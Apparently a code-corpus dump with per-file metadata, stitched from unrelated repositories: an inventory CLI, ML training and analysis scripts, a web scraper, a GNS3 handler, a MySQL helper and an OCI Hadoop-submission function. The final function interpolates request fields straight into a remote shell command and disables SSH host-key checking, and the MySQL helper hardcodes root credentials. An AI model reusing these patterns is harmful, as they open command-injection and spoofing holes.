"line_number": 28,
"usage_type": "call"
},
{
"api_name": "Web_Testing.helperClasses.WebHelper",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "Web_Testing.helperClasses.WebHelper",
"line_number": 34,
"usage_t... |
19509726145 | #README
'''
buka file dengan cara mengetikan:
python main.py "folder_yang_berisi_data_csv"
selama fungsi login belum jadi, cara keluar program adalah control + "c"
'''
#import modul yang dibuat
from read_csv import load
from add_data import *
from write_csv import save
from login import login
from caritahun import cari_tahun
from see_history import see_gadget_return_history,see_consumable_history,see_gadget_borrow_history
from interface import *
import argparse
import os,time
#inisialisasi Data (Loading Data dari CSV)
parser = argparse.ArgumentParser()
parser.add_argument("folder_location", help="Location of the folder that contains all the data.",nargs='?', const='')
args = parser.parse_args()
if args.folder_location is None:
print("Tidak ada folder yang dimasukkan")
exit()
current_path=os.getcwd()
new_path=os.path.join(current_path,args.folder_location)
if os.path.exists(new_path):
data=load(args.folder_location)
else:
print("Folder tidak ada")
exit()
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#Algoritma Program
#User diminta untuk login
valid=False
while not valid:
valid,curret_id,curret_role=login(user)
while valid:
pilihan=input("Masukkan Pilihan Menu: ")
#Masukkan Fungsi-Fungsi Yang Sudah dibuat disini (F01-F17)
#F01 - Register
if pilihan=='register':
if curret_role=='admin':
add_data_user(user)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F02 - Login
#Sudah di atas
#F03 - Pencarian Gadget Berdasarkan Rarity
if pilihan == "carirarity":
rarity=input("Masukkan rarity yang akan dicari: ")
if rarity=='S' or rarity=='A' or rarity=='B' or rarity=='C':
found=False
for j in range(len(gadget)):
if rarity==gadget[j][4]:
found=True
print("Nama Gadget : ",gadget[j][1])
print("Deskripsi : ",gadget[j][2])
print("Jumlah : ",gadget[j][3])
print("Rarity : ",gadget[j][4])
print("Tahun Ditemukan : ",gadget[j][5])
print("")
if not found:
print("Tidak ada gadget dengan rarity tersebut")
else:
print("Rarity tidak valid")
#F04 - Pencarian Gadget Berdasarkan Tahun
if pilihan=='caritahun':
cari_tahun(gadget)
#F05 - Menambah Item
if pilihan == "tambahitem":
if curret_role=='admin':
cek = 0 #untuk mengecek apakah id_item sudah ada
id_item = input("Masukkan ID: ")
if id_item[0] == 'G':
for i in range(1,len(gadget)):
if gadget[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_gadget(id_item,gadget)
elif id_item[0] == 'C':
for i in range(1,len(consumable)):
if consumable[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_consumable(id_item,consumable)
else:
print("Gagal menambahkan item karena ID tidak valid")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F06 - Menghapus Item
if pilihan=='hapusitem':
if curret_role=='admin':
id_item_yang_akan_dihapus=input("Masukkan ID item yang akan dihapus : ")
if id_item_yang_akan_dihapus[0]=='G':
delete_gadget(id_item_yang_akan_dihapus,gadget)
elif id_item_yang_akan_dihapus[0]=='C':
delete_consumable(id_item_yang_akan_dihapus,consumable)
else:
print("ID tidak cocok")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F07 - Mengubah jumlah pada inventory
if pilihan == "ubahjumlah":
if curret_role=='admin':
id_item_yang_akan_diubah = input("Masukan ID: ")
if id_item_yang_akan_diubah[0]=='G':
ubah_jumlah_gadget(id_item_yang_akan_diubah, gadget)
elif id_item_yang_akan_diubah[0]=='C':
ubah_jumlah_consumable(id_item_yang_akan_diubah, consumable)
else:
print("Tidak ada item dengan ID tersebut!")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F08 - Meminjam Gadget
if pilihan=='pinjam':
if curret_role=='user':
add_data_gadget_borrow_history(curret_id,gadget,gadget_borrow_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F09 - Mengembalikan Gadget
if pilihan=='kembalikan':
if curret_role=='user':
add_data_gadget_return_history(curret_id,gadget,gadget_borrow_history,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F10 - Meminta Consumable
if pilihan=='minta':
if curret_role=='user':
add_data_consumable_history(curret_id,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk user")
#F11 - Melihat Riwayat Peminjaman Gadget
if pilihan=='riwayatpinjam':
if curret_role=='admin':
see_gadget_borrow_history(user,gadget,gadget_borrow_history)
#F12 - Melihat Riwayat Pengembalian Gadget
if pilihan=='riwayatkembali':
if curret_role=='admin':
see_gadget_return_history(user,gadget,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F13 - Melihat Riwayat Pengambilan Consumable
if pilihan=='riwayatambil':
if curret_role=='admin':
see_consumable_history(user,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F14 - Load Data
#Sudah pada baigan awal bersama dengan argparse
#F15 - Save Data
if pilihan=='save':
os.system("cls")
path=input("Masukkan Folder tempat file akan di save: ")
save(path,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history)
r=50
for i in range (r):
progressBar(i, r)
time.sleep(.02)
time.sleep(1.5)
data=load(path)
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#F16 - Help
if pilihan == 'help':
print("================================= HELP =================================")
print("register - untuk melakukan registrasi user baru")
print("login - untuk melakukan login ke dalam sistem")
print("carirarity - untuk mencari gadget dengan rarity tertentu")
print("caritahun - untuk mencari gadget berdasarkan tahun ditemukan")
if curret_role=='admin':
print("tambahitem - untuk menambahkan item ke dalam inventori")
print("hapusitem - untuk menghapus suatu item pada database")
print("ubahjumlah - untuk mengubah jumlah gadget dan consumable dalam sistem")
print("riwayatkembali - untuk melihat riwayat pengembalian gadget")
print("riwayatambil - untuk melihat riwayat pengambilan consumable")
else:#curret_role=='user'
print("pinjam - untuk melakukan peminjaman gadget")
print("kembalikan - untuk mengembalikan gadget")
print("minta - untuk meminta consumable yang tersedia")
print("save - untuk melakukan penyimpanan data")
print("help - untuk panduan penggunaan penggunaan sistem")
print("exit - untuk keluar dari aplikasi")
#F17 - Exit
if pilihan == 'exit':
pil = input("Apakah anda mau melakukan penyimpanan file yang sudah diubah? (y/n)")
if pil == "y" or pil == "Y":
path = input("Masukkan Folder tempat file akan di save: ")
save(path, user, gadget, consumable, consumable_history, gadget_borrow_history, gadget_return_history)
break
#FB01 - Hashing
#Done pada hashing.py
#FB02 - Mengembalikan Gadget Secara Parsial
#Done
#FB03 - Gacha
if pilihan=='gacha':
#Validasi User
#Sementara id digenerate otomatis. Nantinya current id
id=1
gacha(id,consumable,consumable_history) | bryanbernigen/TubesSem2 | main.py | main.py | py | 8,850 | python | id | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_nu... |
73485605863 | import argparse
import os
import uuid
import numpy as np
import torch
from torch import optim
from torch.nn import functional
from torch.utils.data import DataLoader
from datasets import load_metric
import albumentations
from albumentations.pytorch import ToTensorV2
from tqdm import tqdm
from utils import set_seed, load_config
from dataset import HarborClassificationDataset, HarborSegmentationDataset
from model import TwinHeadSegformerForSemanticSegmentation
parser = argparse.ArgumentParser(description="Train twin head segformer")
parser.add_argument("--seed", type=int, default=None)
parser.add_argument("--id", type=str, default=None)
parser.add_argument("--num_epochs", type=int, default=None)
args = parser.parse_args()
if args.seed is not None:
set_seed(args.seed)
train_id = args.id
if train_id is None:
train_id = uuid.uuid4().hex
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config = load_config(os.path.join(os.path.dirname(__file__), "config.yaml"))
train_config = config["train"]["twin_head"]
model_name = config["pretrained_model_name"]
label2id = {k: v + 1 for k, v in config["label2id"].items()}
label2id["background"] = 0
id2label = {v: k for k, v in label2id.items()}
transform = albumentations.Compose([
albumentations.CoarseDropout(
max_holes=16, max_height=0.1, max_width=0.1, min_height=0.05, min_width=0.05, p=0.5
),
albumentations.HorizontalFlip(p=0.5),
albumentations.SafeRotate(15, p=0.5),
albumentations.GaussNoise(p=0.5),
albumentations.OpticalDistortion(p=0.5),
albumentations.OneOf([
albumentations.RGBShift(),
albumentations.RandomToneCurve(),
albumentations.InvertImg(),
albumentations.ToGray()
]),
ToTensorV2()
])
classifier_train_dataset = HarborClassificationDataset.from_config(config)
classifier_train_dataset.set_transform(transform)
train_dataset = HarborSegmentationDataset.from_config(config)
train_dataset.set_transform(transform)
classifier_train_dataloader = DataLoader(
classifier_train_dataset, batch_size=train_config["classifier_batch_size"], shuffle=True
)
train_dataloader = DataLoader(
train_dataset, batch_size=train_config["batch_size"], shuffle=True
)
model = TwinHeadSegformerForSemanticSegmentation.from_pretrained(
model_name,
num_labels=len(id2label),
id2label=id2label,
label2id=label2id,
ignore_mismatched_sizes=True
)
model.to(device)
optimizer = optim.AdamW(
model.parameters(),
lr=float(train_config["learning_rate"]),
weight_decay=float(train_config["weight_decay"])
)
accumulation_steps = train_config["accumulation_steps"]
losses = []
f1_metric = load_metric("f1")
miou_metric = load_metric("mean_iou")
model.train()
num_epochs = args.num_epochs
if num_epochs is None:
num_epochs = train_config["num_epochs"]
step = 0
for epoch in range(1, num_epochs + 1):
for (classifier_pixel_values, classifier_labels), segmenter_batch in tqdm(
zip(classifier_train_dataloader, train_dataloader),
train_id,
total=min(len(classifier_train_dataloader), len(train_dataloader))
):
step += 1
classifier_pixel_values = classifier_pixel_values.to(device)
classifier_labels = classifier_labels.to(device)
pixel_values = segmenter_batch["pixel_values"].to(device)
labels = segmenter_batch["labels"].to(device)
outputs = model(
classifier_pixel_values=classifier_pixel_values,
classifier_labels=classifier_labels,
pixel_values=pixel_values,
labels=labels
)
classifier_logits, logits = outputs.classifier_logits, outputs.logits
loss = (outputs.classifier_loss + outputs.loss) / 2
loss /= accumulation_steps
losses.append(loss.item())
loss.backward()
if step % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
f1_metric.add_batch(
predictions=classifier_logits.argmax(dim=-1).detach().cpu().numpy(),
references=classifier_labels.detach().cpu().numpy()
)
if epoch % train_config["eval_frequency"] == 0:
with torch.no_grad():
upsampled_logits = functional.interpolate(
logits,
size=labels.shape[-2:],
mode="bilinear",
align_corners=False
)
predicted = upsampled_logits.argmax(dim=1)
miou_metric.add_batch(
predictions=predicted.detach().cpu().numpy(),
references=labels.detach().cpu().numpy()
)
micro_f1 = f1_metric.compute(average="micro")["f1"]
if epoch % train_config["eval_frequency"]:
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"└─ micro f1: {micro_f1:.4f}\n"
)
else:
miou_metrics = miou_metric.compute(
num_labels=len(id2label), ignore_index=label2id["background"], reduce_labels=False
)
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"├─ micro f1: {micro_f1:.4f}\n"
f"├─ mIoU: {miou_metrics['mean_iou']:.4f}\n"
f"└─ mAcc: {miou_metrics['mean_accuracy']:.4f}\n"
)
torch.save(model, os.path.join(os.path.dirname(__file__), "checkpoints", f"{train_id}_{epoch}.pt"))
| lexiconium/2022_ai_online_competition-sementic_segmentation | train_twin_head_segformer.py | train_twin_head_segformer.py | py | 5,536 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.set_seed",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "torch.device",
... |
8490770607 | #%%
import numpy as np
import pandas as pd
from sklearn import metrics
from matplotlib import pyplot as plt
import glob
#%%
class Takens:
'''
constant
'''
tau_max = 30
'''
initializer
'''
def __init__(self, data,tau=None):
self.data = data
if tau is None:
self.tau, self.nmi = self.__search_tau()
else:
self.tau = tau
'''
reconstruct data by using searched tau
'''
def reconstruct(self):
_data1 = self.data[:-2]
_data2 = np.roll(self.data, -1 * self.tau)[:-2]
_data3 = np.roll(self.data, -2 * self.tau)[:-2]
return np.array([_data1, _data2, _data3])
'''
find tau to use Takens' Embedding Theorem
'''
def __search_tau(self):
# Create a discrete signal from the continunous dynamics
hist, bin_edges = np.histogram(self.data, bins=200, density=True)
bin_indices = np.digitize(self.data, bin_edges)
data_discrete = self.data[bin_indices]
# find usable time delay via mutual information
before = 1
nmi = []
res = None
for tau in range(1, self.tau_max):
unlagged = data_discrete[:-tau]
lagged = np.roll(data_discrete, -tau)[:-tau]
nmi.append(metrics.normalized_mutual_info_score(unlagged, lagged))
if res is None and len(nmi) > 1 and nmi[-2] < nmi[-1]:
res = tau - 1
if res is None:
res = 50
return res, nmi
class Dataset:
def __init__(self,dir_list):
self.root_path_list = dir_list
for dir in self.root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
self.exp_path_list.extend(path_list)
# self.exp_path_list = [p.replace('./', '') for p in self.exp_path_list if 'old' not in p]
# print(self.exp_path_list)
for path in self.exp_path_list:
df = pd.read_csv(path)
self.eigenworm_exp_list.append(np.array(df.loc[:,self.var_name]))
[self.behavior_label_dict[k].append(df.loc[:,k].values) for k in self.behavior_label_name]
self.stimulus_list.append(np.array(df.loc[:,'led']))
#%%
import itertools
import os
var_name = ['a_1','a_2','a_3','a_4','a_5','VelocityTailToHead']
root_path_list = ['data/141_ASH_02/']
exp_path_list = []
for dir in root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
exp_path_list.extend(path_list)
dataset = {}
for i, name in enumerate(var_name):
eigenworm_exp_list = []
d = []
for path in exp_path_list:
df = pd.read_csv(path)
d.append(np.array(df.loc[:,name]))
d_1D = list(itertools.chain.from_iterable(d))
dataset[name] = d_1D
#%%
# eigenworm_exp_list = np.array(eigenworm_exp_list)
#
fig, axs = plt.subplots(6,2, figsize=(15,30))
plt_sample_size = 30000
for i, name in enumerate(var_name):
takens = Takens(dataset[name],tau=10)
emd = takens.reconstruct()
tau = takens.tau
axs[i,0].scatter(emd[0,:plt_sample_size],emd[1,:plt_sample_size],s=1,c=dataset["VelocityTailToHead"][:plt_sample_size])
axs[i,1].plot(emd[0,:10000],emd[1,:10000],lw=0.2)
axs[i,0].set_title(name+'\n'+'tau:'+str(tau))
axs[i,1].set_title(name+'\n'+'tau:'+str(tau))
plt.show()
#%%
fig.savefig("tde.png",dpi=150)
#%%
position = np.array(df.loc[:,["posCentroidX","posCentroidY"]])
velocity = np.array(df.loc[:,["VelocityTailToHead"]])
#%%
# plt.plot(emd[0,:1000],emd[1,:1000],'gray',lw=0.1)
plt.scatter(emd[0,:60000],emd[2,:60000],s=1,c=dataset["VelocityTailToHead"][:60000])
plt.savefig('tde_velocity_all.png',dpi=150)
#%%
| kei-mo/BehavCrassificationElegans_TDE | tde.py | tde.py | py | 3,519 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.roll",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.roll",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.histogram",
"line_number"... |
70477030183 | import os
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.by import By
from lxml import etree
browser = webdriver.Chrome()
browser.maximize_window() # 창 최대화
# 1. 페이지 이동
url = 'https://finance.naver.com/sise/sise_market_sum.naver?&page='
browser.get(url) # 해당 url로 페이지 이동
# 2. 조회 항목 초기화 (체크 되어 있는 항목 체크 해제)
checkboxes = browser.find_elements(By.NAME, 'fieldIds') # 해당 브라우저(네이버 주식)에 elements들을 찾는데 그 중에 name 속성이 fieldIds인 것들만 찾아 변수에 담아주기
for checkbox in checkboxes:
if checkbox.is_selected(): # 체크된 상태라면
checkbox.click() # 기존 클릭되어 있는걸 다시 클릭하여 클릭 해제 시킨다.
# 3. 조회 항목 설정 (원하는 항목)
items_to_select = ['영업이익', '자산총계', '매출액']
for checkbox in checkboxes:
parent = checkbox.find_element(By.XPATH, '..') # 부모 element를 찾는다. 즉, 여기선 <td> 태그를 찾는다
label = parent.find_element(By.TAG_NAME, 'label') # <td> 태그 안에 있는 label을 찾는다
# print(label.text) # 이름 확인
if label.text in items_to_select: # 선택 항목과 일치 한다면
checkbox.click() # 체크
# 4. 적용하기 버튼 클릭
btn_apply = browser.find_element(By.XPATH, '//a[@href="javascript:fieldSubmit()"]') # //은 html 전체 문서에서 찾겠다는 의미
btn_apply.click()
for idx in range(1, 40): # 1~40 미만 반복
# 4.5 사전작업 : 페이지 이동
browser.get(url + str(idx)) # e.g) https://finance/naver.com/~~~&=1~2...
# 5. 데이터 추출
df = pd.read_html(browser.page_source)[1]
# 데이터 결측치란? 데이터에 값이 없다는 것을 뜻 함. NaN, NA, 료ull
# axis='index' : row 기준으로 삭제,
# how='all' : row(줄) 전체가 데이터가 없다면 지움
# inplace=True : 데이터 반영
df.dropna(axis='index', how='all', inplace=True)
df.dropna(axis='columns', how='all', inplace=True)
if len(df) == 0: # 더 이상 가져올 데이터가 없으면?
break
# 6. 파일 저장 => import os
f_name = 'sise.csv'
if os.path.exists(f_name): # 파일이 있다면? 헤더 제외
df.to_csv(f_name, encoding='utf-8-sig', index=False, mode='a', header=False) # 헤더 제외하고 append 해서 데이터 넣기
else: # 파일이 없다면? 헤더 포함. 즉, 처음 파일 만들 때
df.to_csv(f_name, encoding='utf-8-sig', index=False)
print(f'{idx} 페이지 완료')
browser.quit() # 브라우저 종료 | thisiswoo/python_practice | naver_stock_crawling/market_cap.py | market_cap.py | py | 2,652 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.common.by.By.NAME",
"line_number": 15,
"usage_type": "attribute"
},
{
... |
24065321916 | import os
import psutil
import platform
from gns3server.web.route import Route
from gns3server.config import Config
from gns3server.schemas.version import VERSION_SCHEMA
from gns3server.compute.port_manager import PortManager
from gns3server.version import __version__
from aiohttp.web import HTTPConflict
class ServerHandler:
@Route.get(
r"/version",
description="Retrieve the server version number",
output=VERSION_SCHEMA)
def version(request, response):
config = Config.instance()
local_server = config.get_section_config("Server").getboolean("local", False)
response.json({"version": __version__, "local": local_server})
@Route.get(
r"/debug",
description="Return debug informations about the compute",
status_codes={
201: "Writed"
})
def debug(request, response):
response.content_type = "text/plain"
response.text = ServerHandler._getDebugData()
@staticmethod
def _getDebugData():
try:
addrs = ["* {}: {}".format(key, val) for key, val in psutil.net_if_addrs().items()]
except UnicodeDecodeError:
addrs = ["INVALID ADDR WITH UNICODE CHARACTERS"]
data = """Version: {version}
OS: {os}
Python: {python}
CPU: {cpu}
Memory: {memory}
Networks:
{addrs}
""".format(
version=__version__,
os=platform.platform(),
python=platform.python_version(),
memory=psutil.virtual_memory(),
cpu=psutil.cpu_times(),
addrs="\n".join(addrs)
)
try:
connections = psutil.net_connections()
# You need to be root for OSX
except psutil.AccessDenied:
connections = None
if connections:
data += "\n\nConnections:\n"
for port in PortManager.instance().tcp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "TCP {}: {}\n".format(port, found)
for port in PortManager.instance().udp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "UDP {}: {}\n".format(port, found)
return data
| vieyahn/docker-cisco-lab | gns3server/gns3server/handlers/api/compute/server_handler.py | server_handler.py | py | 2,414 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gns3server.config.Config.instance",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gns3server.config.Config",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "gns3server.version.__version__",
"line_number": 23,
"usage_type": "name"
},
... |
26259789038 | # Problem : Inverse Geodesic using GeographicLib
from geographiclib.geodesic import Geodesic
geod = Geodesic.WGS84 # กำหนดให้เป็นแบบจำลอง WGS84
def Geodesic_Inverse( lat1, lng1, lat2, lng2 ): # สร้างฟังก์ชันเพื่อหา Geodesic ด้วยวิธิ Inverse
result = geod.Inverse(lat1, lng1, lat2, lng2)
# กำหนด result เพื่อรองรับผลลัพธ์จากการเรียกใช้ Geodesic
fwd_Az1, fwd_Az2, s12 = result['azi1'], result['azi2'], result['s12']
# กำหนด forward แอซิมัธของจุดต้นทางและเก็บค่าแอซิมัธ
return fwd_Az1, fwd_Az2, s12
fwd_Az1, fwd_Az2, s12 = Geodesic_Inverse( 52.30861, 4.76389, 26.27083, 50.6336 )
# เก็บค่าที่ออกมาจากการใช้ฟังก์ชันไว้ในตัวแปรทั้งสามตัว
print(' fwd_Az1 | fwd_Az2 | Distance')
print( ' {:.5f} {:.5f} {:.3f} m. '.format(fwd_Az1, fwd_Az2, s12))
| isara-c/Geodesy-SurveyEng | GeodesicAirliner.py | GeodesicAirliner.py | py | 1,163 | python | th | code | 0 | github-code | 36 | [
{
"api_name": "geographiclib.geodesic.Geodesic.WGS84",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "geographiclib.geodesic.Geodesic",
"line_number": 4,
"usage_type": "name"
}
] |
14934819007 | import pytest
from dbt.tests.adapter.utils.data_types.test_type_bigint import BaseTypeBigInt
from dbt.tests.adapter.utils.data_types.test_type_bigint import (
models__actual_sql as bigint_model,
)
from dbt.tests.adapter.utils.data_types.test_type_bigint import (
models__expected_sql as bigint_expected,
)
from dbt.tests.adapter.utils.data_types.test_type_boolean import (
BaseTypeBoolean,
)
from dbt.tests.adapter.utils.data_types.test_type_boolean import (
models__actual_sql as bool_model,
)
from dbt.tests.adapter.utils.data_types.test_type_float import BaseTypeFloat
from dbt.tests.adapter.utils.data_types.test_type_float import (
models__actual_sql as float_model,
)
from dbt.tests.adapter.utils.data_types.test_type_int import BaseTypeInt
from dbt.tests.adapter.utils.data_types.test_type_int import (
models__actual_sql as int_model,
)
from dbt.tests.adapter.utils.data_types.test_type_numeric import (
BaseTypeNumeric,
)
from dbt.tests.adapter.utils.data_types.test_type_numeric import (
models__actual_sql as num_model,
)
from dbt.tests.adapter.utils.data_types.test_type_string import BaseTypeString
from dbt.tests.adapter.utils.data_types.test_type_string import (
models__actual_sql as string_model,
)
from dbt.tests.adapter.utils.data_types.test_type_timestamp import (
BaseTypeTimestamp,
)
from dbt.tests.adapter.utils.data_types.test_type_timestamp import (
models__actual_sql as ts_model,
)
from firebolt import __version__ as sdk_version
schema_actual_table_yml = """
version: 2
models:
- name: actual
config:
materialized: table
"""
schema_expected_table_yml = """
version: 2
models:
- name: expected
config:
materialized: table
"""
class TestTypeBigInt(BaseTypeBigInt):
@pytest.fixture(scope='class')
def models(self):
return {
'expected.yml': schema_expected_table_yml,
'expected.sql': bigint_expected,
'actual.yml': schema_actual_table_yml,
'actual.sql': self.interpolate_macro_namespace(bigint_model, 'type_bigint'),
}
class TestTypeFloat(BaseTypeFloat):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(float_model, 'type_float'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeInt(BaseTypeInt):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(int_model, 'type_int'),
'actual.yml': schema_actual_table_yml,
}
@pytest.mark.skipif(
sdk_version <= '0.15.0', reason='Decimal type implemented in firebolt-sdk>0.15.0'
)
class TestTypeNumeric(BaseTypeNumeric):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(num_model, 'type_numeric'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeString(BaseTypeString):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(string_model, 'type_string'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeTimestamp(BaseTypeTimestamp):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(ts_model, 'type_timestamp'),
'actual.yml': schema_actual_table_yml,
}
@pytest.mark.skip('True boolean is feature-flagged')
class TestTypeBoolean(BaseTypeBoolean):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(bool_model, 'type_boolean'),
'actual.yml': schema_actual_table_yml,
}
| firebolt-db/dbt-firebolt | tests/functional/adapter/utils/test_data_types.py | test_data_types.py | py | 3,823 | python | en | code | 26 | github-code | 36 | [
{
"api_name": "dbt.tests.adapter.utils.data_types.test_type_bigint.BaseTypeBigInt",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "dbt.tests.adapter.utils.data_types.test_type_bigint.models__expected_sql",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "dbt.t... |
32527451220 | import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
def get_web_source():
with open('pylib_data.html','r') as r:
data = r.read()
return data
#print(data)
def get_url_list(web_source):
#url = 'https://www.lfd.uci.edu/~gohlke/pythonlibs/'
base_url = 'https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/'
#try:
# web_source = requests.get(url).text
#except:
# print('请求失败!')
soup = BeautifulSoup(web_source,'lxml')
names = soup.select('.pylibs li ul li a')
url_list = []
str1 = names[0].text
#str2 = str1.encode('utf-8').decode('windows-1252')
#str2.encode('windows-1252').decode('utf-8')
print(str1)
print(str1)
for name in names:
#name1 = str(name.text)
#name1.replace(' ','_')
#print(name1)
url = base_url+name.text
#print(url)
if '.whl' in url:
print(url)
url_list.append(url)
with open('E:\\Desktop\\url.txt','a',encoding='utf-8') as f:
f.write(url+'\n')
return url_list
#web_source = get_web_source()
#url_list = get_url_list(web_source)
#print(url_list)
def download_whl(url):
try:
source = requests.get(url)
except:
print('请求资源错误!')
file_name = url.split('/')[-1]
print('正在下载:'+file_name)
with open('E:\\Desktop\\python_whl\\'+file_name,'wb') as f:
f.write(source.content)
#download_whl('https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/ad3_2.2.1_cp27_cp27m_win32.whl')
def main():
pool = Pool(20)
web_source = get_web_source()
url_list = get_url_list(web_source)
#print(url_list)
pool.map(download_whl,url_list)
pool.close()
if __name__ == '__main__':
main()
| MrDannyWu/DannyPythonStudy | py_script/get_python_libs.py | get_python_libs.py | py | 1,785 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 52,
"usage_type": "call"
}
] |
37088074525 | # -*- coding: utf-8 -*-
import MySQLdb as MySQL # pip install mysqlclient
class WorkWithDb:
def __init__(self):
pass
def perform_connection(self):
try_connection_count = 0
print("Подключение к базе...")
while try_connection_count <= 3:
try:
self.db = MySQL.connect(host="127.0.0.1", user="root", passwd="root", db="lazy24", charset="utf8mb4")
print("Установлено соединение")
try_connection_count = 0
return True
except Exception:
try_connection_count += 1
if try_connection_count <= 3:
print(f"Не удается подключиться к базе, выполняется попытка подключиться"
f" № {try_connection_count}...")
else:
print("!!! Ошибка: Проблема с подключением к базе. Проверьте ваше интернет соединение")
return False
def close_connection(self):
self.db.close()
def load_data(self, text_query):
try_count = 0
with self.db.cursor() as cur:
try:
# Запрос на получение данных
cur.execute(text_query)
# Извлечение данных
self.data = cur.fetchall()
print("Данные загружены")
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(text_query)
def insert_data(self, data):
with self.db.cursor() as cur:
try:
# Запрос на занесение данных
cur.execute(data)
# Подтверждение
self.db.commit()
cur.close()
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(data)
def load_column_data(self, shipments_name):
with self.db.cursor() as cur:
try:
# Получаем названия столбцов таблицы
cur.execute = cur.execute("""SHOW COLUMNS FROM {};""".format(shipments_name))
columns_names = cur.fetchall()
self.columns_names = [item[0] for item in columns_names]
print("Название колонок загружено")
cur.close()
except Exception:
print("Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_column_data(shipments_name)
def get_data(self):
return self.data
def get_columns_names(self):
return self.columns_names
| Swarmi24/Lazy24 | workwithdb.py | workwithdb.py | py | 3,260 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "MySQLdb.connect",
"line_number": 15,
"usage_type": "call"
}
] |
9395923393 | import oci
import paramiko
import json
def submit_hadoop_job(job_params):
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
instance_ip = "YOUR_INSTANCE_IP"
private_key_path = "/path/to/your/private/key"
# Connect to the Hadoop cluster using SSH
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key = paramiko.RSAKey(filename=private_key_path)
ssh_client.connect(hostname=instance_ip, username="opc", pkey=ssh_key)
# Submit the Hadoop job using SSH
command = f'hadoop jar {job_params["jar_path"]} {job_params["job_class"]} {job_params["input_path"]} {job_params["output_path"]}'
stdin, stdout, stderr = ssh_client.exec_command(command)
# Close SSH connection
ssh_client.close()
return stdout.read()
def handle_request(request):
try:
job_params = {
"jar_path": request.get("jar_path"),
"job_class": request.get("job_class"),
"input_path": request.get("input_path"),
"output_path": request.get("output_path")
}
job_status = submit_hadoop_job(job_params)
return {
"message": "Hadoop job submitted successfully",
"job_status": job_status.decode('utf-8')
}
except Exception as e:
return {
"error": str(e)
}
def handler(ctx, data):
try:
